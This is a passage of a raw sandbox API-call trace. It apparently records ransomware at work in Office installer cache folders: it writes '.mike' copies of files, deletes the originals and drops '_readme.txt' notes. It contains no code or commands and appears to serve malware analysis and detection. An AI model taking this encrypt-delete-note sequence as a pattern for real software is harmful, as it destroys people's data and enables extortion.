SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0039.896] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.896] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.896] GetFileType (hFile=0x264) returned 0x1 [0039.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.896] GetFileType (hFile=0x264) returned 0x1 [0039.896] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0039.896] WriteFile (in: hFile=0x264, lpBuffer=0x21f2c20*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21f2c20*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0039.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0039.897] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21f2728 | out: lpFileInformation=0x21f2728*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648)) returned 1 [0039.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0039.897] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0039.897] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.897] GetFileType (hFile=0x264) returned 0x1 [0039.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0039.897] GetFileType (hFile=0x264) returned 0x1 [0039.898] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0039.898] ReadFile (in: hFile=0x264, lpBuffer=0x21f3d48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21f3d48*, lpNumberOfBytesRead=0x2af110*=0x648, lpOverlapped=0x0) returned 1 [0039.939] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.939] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.939] GetFileType (hFile=0x264) returned 0x1 [0039.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.939] GetFileType (hFile=0x264) returned 0x1 [0039.939] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0039.939] WriteFile (in: hFile=0x264, lpBuffer=0x21f91b4*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21f91b4*, lpNumberOfBytesWritten=0x2af104*=0x650, lpOverlapped=0x0) returned 1 [0039.940] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0039.940] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.940] GetFileType (hFile=0x264) returned 0x1 [0039.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0039.940] GetFileType (hFile=0x264) returned 0x1 [0039.941] WriteFile (in: hFile=0x264, lpBuffer=0x21fc3dc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21fc3dc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0039.941] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.941] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.942] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1fc3be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870)) returned 1 [0039.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.942] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.942] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.942] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21fdb58 | out: lpFileInformation=0x21fdb58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1fc3be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870)) returned 1 [0039.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.942] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.942] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0039.942] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.942] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0039.943] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.943] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.943] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.943] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0039.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0039.943] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.944] GetFileType (hFile=0x264) returned 0x1 [0039.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0039.944] GetFileType (hFile=0x264) returned 0x1 [0039.944] WriteFile (in: hFile=0x264, lpBuffer=0x21ff83c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21ff83c*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0039.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.945] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.945] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0039.945] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1f9da80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1f9da80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f9da80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml.mike", cAlternateFileName="PUBLIS~1.MIK")) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1fc3be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1fc3be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1fc3be0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1fc3be0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2036000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0039.947] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0039.947] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.947] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.947] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.947] CoTaskMemFree (pv=0x4fe370) [0039.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.947] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.947] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.947] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0039.947] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.999] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.999] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0039.999] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0039.999] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0039.999] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.000] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.000] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0040.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0040.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0040.001] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 